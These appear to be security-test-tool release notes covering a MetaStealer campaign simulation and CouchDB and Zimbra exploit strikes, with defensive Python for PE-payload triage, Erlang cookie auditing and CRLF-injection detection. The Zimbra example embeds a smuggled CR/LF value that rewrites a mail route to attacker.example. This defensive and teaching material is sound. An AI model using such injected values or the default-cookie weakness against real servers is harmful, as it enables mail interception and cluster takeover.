ATI Update ATI-2022-22

New Protocols & Applications (4)

Name | Category | Info
Box REST API | Data Transfer/File Sharing | Box is a cloud file-sharing application that offers REST API utilities for distributed file sharing. This simulates a Box file upload action using a pre-authenticated developer token.
Doordash Oct 2022 | Social Networking/Search | Doordash is a food ordering and delivery app.
Snapchat Web Oct22 | Social Networking/Search | Snapchat is a free social media application that lets users send each other text messages and "snaps", which are messages embedded in images.
Uber Oct 2022 | Social Networking/Search | Uber is a mobility-as-a-service provider that allows users to book cars.

New Superflows (6)

Name | Category | Tags | Info
Doordash Oct 2022 | Social Networking/Search | Web, SimulatedTLS | Doordash is a food ordering and delivery app. This simulates the scenario where a user opens the Doordash app on an iOS device, browses the home screen, searches for a restaurant and opens its food listings.
Snapchat Web Oct22 | Social Networking/Search | Voice/Video/Media, Chat/IM, HTTP/2 | Simulates the use of the Snapchat application as of September 2022, where a user opens the website, logs in, sends a text message and then a "snap" message.
Snapchat Web Bandwidth Oct22 | Social Networking/Search | Voice/Video/Media, Chat/IM, HTTP/2 | Simulates the use of the Snapchat application as of September 2022, where a user sends a text message and a "snap" message.
Snapchat Web Send Text Message Oct22 | Social Networking/Search | Voice/Video/Media, Chat/IM, HTTP/2 | Simulates the use of the Snapchat application as of September 2022, where a user logs in and sends a text message.
Twitch Mar18 - HTTP/2 | Voice/Video/Media | HTTP/2 | Simulates the use of Twitch.tv as of March 2018 over HTTP/2. The user loads the twitch.tv page, selects the Browse button, lists the available Top Channels, then selects and plays one of them.
Uber Oct 2022 | Social Networking/Search | Web, SimulatedTLS | Uber is a mobility-as-a-service provider that allows users to book cars. This simulates the scenario where a user opens the Uber app on an iOS device, searches for pickup and drop-off locations and books a ride.

New Application Profiles (1)

Name | Info
Sandvine 2022 Global Social | Simulates the downstream traffic generated by the top 10 social media applications reported in the Sandvine Global Internet Phenomena Report, January 2022. The weights are extrapolated from the GLOBAL APP TRAFFIC SHARE table in that report.

New Security Tests (1)

Name | Info
MetaStealer Mar 2022 Campaign | This strike list contains 4 strikes simulating the 'MetaStealer Mar 2022 Campaign'.

1. The first strike simulates a phishing email that has been seen in the wild pushing MetaStealer malware. This specific phishing attempt is related to the 'MetaStealer Mar 2022 Malware Campaign' and tries to trick the user into opening a malicious Excel document with an embedded macro in order to download the malware.
2. The second strike simulates the HTTPS traffic that is generated after the malware is executed in the 'MetaStealer Mar 2022 Malware Campaign'. Once the Excel macro has been executed, the malware sends an HTTPS request to GitHub to download a malicious, uncompressed data binary.
3. The third strike simulates the HTTPS traffic that is generated after the malware is executed in the 'MetaStealer Mar 2022 Malware Campaign'. Once the persistent executable is run, the malware sends an HTTPS request to download a malicious byte-reversed Windows DLL.
4. The fourth strike simulates the 'MetaStealer Mar 2022 Malware Campaign' command-and-control HTTP traffic. Once the persistent executable is run, the malware sends an HTTPS request to download a malicious byte-reversed Windows DLL, as well as an HTTP GET request to the same URI; that GET request is the one represented in this strike. After the malicious MetaStealer DLL is loaded, several HTTP GET requests are sent to an external server. The first HTTP request retrieves a base64-encoded Windows DLL. Then two more HTTP requests, a GET and a POST, are sent to external servers to update status and wait for additional commands.

It contains the following sequence of strikes:
1) /strikes/phishing/metastealer_mar_2022_campaign_phishing_email.xml
2) /strikes/malware/apt/metastealer_mar_2022_campaign/metastealer_mar_2022_malware_retrieval.xml
3) /strikes/botnets/apt/metastealer_mar_2022_campaign/metastealer_mar_2022_dll_retrieval.xml
4) /strikes/botnets/apt/metastealer_mar_2022_campaign/metastealer_mar_2022_campaign_command_control.xml

# | Strike ID | Name | Description
1 | P22-e2pm1 | MetaStealer Mar 2022 Campaign - Phishing Email (TTP T1566) | This strike simulates a phishing email that has been linked with the MetaStealer Mar 2022 Campaign. It tries to trick the user into downloading a malicious zip archive. This archive contains an XLS file with an embedded macro. Once executed, this macro makes a request to GitHub to download a malicious data binary used to establish persistence on the host.
2 | M22-Cemt1 | MetaStealer Mar 2022 Malware Campaign - Persistence Binary Retrieval | This strike simulates the HTTPS traffic that is generated after the malware is executed in the 'MetaStealer Mar 2022 Malware Campaign'. Once the Excel macro has been executed, the malware sends an HTTPS request to GitHub to download a malicious, uncompressed data binary.
3 | B22-pudx1 | MetaStealer Mar 2022 Malware Campaign - Windows DLL Retrieval | This strike simulates the HTTPS traffic that is generated after the malware is executed in the 'MetaStealer Mar 2022 Malware Campaign'. Once the persistent executable is run, the malware sends an HTTPS request to download a malicious byte-reversed Windows DLL.
4 | B22-psrt1 | MetaStealer Mar 2022 Malware Campaign - Command and Control Traffic | This strike simulates the HTTP traffic that is generated after the malware is executed in the 'MetaStealer Mar 2022 Malware Campaign'. Once the persistent executable is run, the malware sends an HTTPS request to download a malicious byte-reversed Windows DLL, as well as an HTTP GET request to the same URI; that GET request is the one represented in this strike. After the malicious MetaStealer DLL is loaded, several HTTP GET requests are sent to an external server. The first HTTP request retrieves a base64-encoded Windows DLL. Then two more HTTP requests, a GET and a POST, are sent to external servers to update status and wait for additional commands.
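The three download stages in this strike list differ only in how the Windows executable is wrapped on the wire: a plain binary, a byte-reversed DLL, and a base64-encoded DLL. The Python below is an added example, not part of this ATI update or of the BreakingPoint strikes, showing how a detection pipeline can label an HTTP response body by locating the MZ/PE headers in the raw, reversed or decoded bytes. The PE-shaped stub and the transaction list (with placeholder URLs) are constructed here for illustration and are not campaign indicators.

```python
import base64
import re

PE_SIGNATURE = b"PE\x00\x00"


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def classify_payload(body: bytes) -> str:
    """Label a downloaded body as a plain, byte-reversed or base64-encoded PE, else 'unknown'."""
    if looks_like_pe(body):
        return "pe"
    # A byte-reversed PE ends with b"ZM"; reversing the whole body restores the original layout.
    if looks_like_pe(body[::-1]):
        return "pe-reversed"
    # Base64 bodies: strip whitespace, require the base64 alphabet, then decode and retest.
    stripped = re.sub(rb"\s+", b"", body)
    if stripped and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", stripped) and len(stripped) % 4 == 0:
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except ValueError:
            return "unknown"
        if looks_like_pe(decoded):
            return "pe-base64"
        if looks_like_pe(decoded[::-1]):
            return "pe-base64-reversed"
    return "unknown"


def make_fake_pe() -> bytes:
    """Constructed minimal PE-shaped stub (not a runnable executable) for exercising the classifier."""
    e_lfanew = 0x40
    data = bytearray(b"MZ\x90\x00")
    data += b"\x00" * (0x3C - len(data))          # pad up to the e_lfanew field
    data += e_lfanew.to_bytes(4, "little")         # e_lfanew -> PE header at 0x40
    data += PE_SIGNATURE + b"\x64\x86" + b"\x00" * 18   # 'PE\0\0', machine = AMD64, padding
    data += b"This program cannot be run in DOS mode."
    return bytes(data)


def triage_transactions(transactions):
    """Run the classifier over (method, url, response_body) tuples; return only PE-carrying ones."""
    hits = []
    for method, url, body in transactions:
        label = classify_payload(body)
        if label != "unknown":
            hits.append((method, url, label))
    return hits


# Constructed sample session mirroring the stages described above (placeholder URLs).
SAMPLE_TRANSACTIONS = [
    ("GET", "https://raw.example/stage1.dat", make_fake_pe()),            # plain binary
    ("GET", "https://stage2.example/loader.dat", make_fake_pe()[::-1]),   # byte-reversed DLL
    ("GET", "https://c2.example/module", base64.b64encode(make_fake_pe())),  # base64 DLL
    ("POST", "https://c2.example/status", b"id=123&state=idle"),          # status beacon, no payload
]

if __name__ == "__main__":
    for hit in triage_transactions(SAMPLE_TRANSACTIONS):
        print(*hit)
```

Checking the reversed body first and the decoded body second keeps the cost low for ordinary responses: a non-PE body fails the two-byte MZ check immediately, and base64 decoding is only attempted when the whole body is in the base64 alphabet.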

New Strikes (2)

CVSS | ID | References | Category | Info
10.0 | E22-edky1 | CVE-2022-24706, CVSS, CVSSv3, CWE-1188, URL | Exploits | This strike exploits an authentication bypass vulnerability in Apache CouchDB (fixed in CouchDB 3.2.2). The vulnerability is due to CouchDB shipping with a default Erlang cookie, which is the only secret used to authenticate cluster nodes to one another. A remote, unauthenticated attacker who can reach the node's Erlang distribution port can exploit this vulnerability by presenting the default cookie and joining the CouchDB cluster as a peer node. Successful exploitation allows the attacker to bypass authentication and perform arbitrary actions with administrative privileges. *NOTE: While running this strike in One-Arm mode, a file /tmp/test.txt is created on the server.
5.0 | E22-eg2c1 | CVE-2022-27924, CVSS, CVSSv3, CWE-93, URL | Exploits | This strike exploits a CRLF (carriage return followed by line feed) injection vulnerability in Zimbra Collaboration Suite. The vulnerability is due to insufficient sanitization of CRLF characters in HTTP request-URIs and HTTP header values when the server looks up and caches mail routes in Memcached. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation allows the attacker to inject arbitrary Memcached commands, which the Memcached instance executes, for example to overwrite cached route entries.
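The CouchDB entry above turns on a property of the Erlang distribution protocol: peers authenticate with a challenge/response whose only secret is the shared cookie, so a cookie that is public knowledge is equivalent to no authentication at all. The Python below is an added example, not code from this ATI update, from CouchDB or from Erlang/OTP: it reproduces the digest rule from Erlang's dist_util (MD5 over the cookie followed by the decimal challenge) to play the exchange from both sides with matching and mismatching cookies, and it audits a vm.args file for the cookie value CouchDB shipped before 3.2.2 (monster). The vm.args text is constructed; the class models only the challenge/response part of the handshake, not the wire framing.

```python
import hashlib
import os
import re

# Cookie value CouchDB shipped in etc/vm.args before the 3.2.2 fix for CVE-2022-24706.
KNOWN_DEFAULT_COOKIES = {"monster"}


def gen_digest(challenge: int, cookie: str) -> bytes:
    """Erlang dist_util:gen_digest/2: md5(Cookie ++ integer_to_list(Challenge))."""
    return hashlib.md5(cookie.encode() + str(challenge).encode()).digest()


class ErlangNode:
    """Just enough of the distribution handshake to show what the cookie protects."""

    def __init__(self, name: str, cookie: str):
        self.name = name
        self.cookie = cookie
        self.my_challenge = None

    def send_challenge(self) -> int:
        # The accepting node's challenge message carries a random 32-bit challenge.
        self.my_challenge = int.from_bytes(os.urandom(4), "big")
        return self.my_challenge

    def challenge_reply(self, peer_challenge: int):
        # Reply: our own challenge plus the digest of the peer's challenge under our cookie.
        self.my_challenge = int.from_bytes(os.urandom(4), "big")
        return self.my_challenge, gen_digest(peer_challenge, self.cookie)

    def check_digest(self, digest: bytes) -> bool:
        # A node accepts the peer only if the digest matches under its own cookie.
        return digest == gen_digest(self.my_challenge, self.cookie)


def handshake(server: ErlangNode, client: ErlangNode) -> bool:
    """Return True when the client is admitted to the server's cluster (both sides verified)."""
    server_challenge = server.send_challenge()
    client_challenge, reply_digest = client.challenge_reply(server_challenge)
    if not server.check_digest(reply_digest):
        return False  # server side: wrong cookie, connection closed
    ack_digest = gen_digest(client_challenge, server.cookie)  # challenge ack
    return client.check_digest(ack_digest)  # client verifies the server too


def audit_vm_args(text: str) -> list:
    """Flag a missing or well-known default -setcookie in a CouchDB vm.args."""
    findings = []
    m = re.search(r"^\s*-setcookie\s+(\S+)", text, re.MULTILINE)
    if m is None:
        findings.append("no -setcookie line: node falls back to ~/.erlang.cookie")
    elif m.group(1) in KNOWN_DEFAULT_COOKIES:
        findings.append(f"default cookie '{m.group(1)}' in use: any peer that knows it can join the cluster")
    return findings


# Constructed vm.args excerpt in the shape CouchDB used before 3.2.2.
SAMPLE_VM_ARGS = """\
-name couchdb@127.0.0.1
-setcookie monster
-kernel error_logger silent
"""

if __name__ == "__main__":
    node = ErlangNode("couchdb@db1", "monster")
    print("default cookie admits peer:", handshake(node, ErlangNode("peer@attacker", "monster")))
    print("random cookie rejects peer:", handshake(ErlangNode("couchdb@db1", "x7Qk9pL2mN4r"), ErlangNode("peer@attacker", "monster")))
    for finding in audit_vm_args(SAMPLE_VM_ARGS):
        print("finding:", finding)
```

Because the digest is a plain MD5 over cookie and challenge, a peer that knows the cookie answers every challenge correctly on the first try; there is nothing else to brute-force or guess. Rotating the cookie to a random value and keeping the distribution port off untrusted networks are the two controls that matter.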
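The Zimbra entry above rests on the line-oriented Memcached text protocol: every command ends at "\r\n", so a CR/LF smuggled into a value that the server interpolates into a lookup key terminates that command and lets the attacker append commands of their own. The Python below is an added example, not code from this ATI update or from Zimbra: it places the unsafe key-building pattern next to a hardened one, splits the resulting wire text the way a Memcached text parser would, and scans a constructed request for percent-encoded CR/LF. The key layout route:<proto>:<user> is an illustrative assumption, not Zimbra's real cache key.

```python
import re
from urllib.parse import unquote

# Memcached text-protocol keys: no whitespace or control characters, at most 250 bytes.
SAFE_USER_CHARS = re.compile(r"[A-Za-z0-9._@+\-]+")
MAX_KEY_LEN = 250


def build_route_lookup_unsafe(proto: str, user: str) -> str:
    """Vulnerable pattern: a request-derived user value goes straight into the command line."""
    return f"get route:{proto}:{user}\r\n"


def build_route_lookup_safe(proto: str, user: str) -> str:
    """Hardened: enforce a strict key alphabet and length before anything reaches Memcached."""
    key = f"route:{proto}:{user}"
    if not SAFE_USER_CHARS.fullmatch(user) or len(key.encode()) > MAX_KEY_LEN:
        raise ValueError("refusing to build a Memcached key from an unsafe user value")
    return f"get {key}\r\n"


def memcached_lines(wire: str) -> list:
    """Split wire text into the protocol lines a Memcached text parser would consume."""
    return [line for line in wire.split("\r\n") if line]


def find_crlf_injection(request_line: str, headers: dict) -> list:
    """Flag raw or percent-encoded CR/LF in the request-target or in any header value."""
    findings = []
    _method, target, _version = request_line.split(" ", 2)
    if re.search(r"[\r\n]", unquote(target)):
        findings.append(f"request-target carries CR/LF: {target!r}")
    for name, value in headers.items():
        if re.search(r"[\r\n]", unquote(value)):
            findings.append(f"header {name} carries CR/LF: {value!r}")
    return findings


# Constructed attacker input: the username smuggles a 'set' that rewrites another user's route
# (21 = byte length of the data block "attacker.example:8143").
INJECTED_USER = "alice\r\nset route:imap:bob 0 0 21\r\nattacker.example:8143\r\n"
SAMPLE_REQUEST_LINE = (
    "GET /service/alice%0D%0Aset%20route%3Aimap%3Abob%200%200%2021"
    "%0D%0Aattacker.example%3A8143%0D%0A HTTP/1.1"
)

if __name__ == "__main__":
    print("unsafe builder sends:", memcached_lines(build_route_lookup_unsafe("imap", INJECTED_USER)))
    try:
        build_route_lookup_safe("imap", INJECTED_USER)
    except ValueError as exc:
        print("safe builder:", exc)
    for finding in find_crlf_injection(SAMPLE_REQUEST_LINE, {"Host": "mail.example"}):
        print("finding:", finding)
```

The unsafe builder emits three protocol lines for one intended lookup: the original get, the injected set, and its data block. Rejecting the value with an allow-list is preferable to stripping CR/LF, since stripping can silently merge an attacker's fragments into a different but still valid key.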

Enhancements

Component | Info
Apps | The HTTP/2 tag was added to the Twitch Mar18 superflow.

Defects Resolved

Component | Info
Apps | Updated the description of the Transaction Flag parameter.
Security | Fixed the 'no implicit conversion of string to integer' error that occurred when running FileTransfer and Malware strikes with an evasion profile modified to use the HTTP protocol.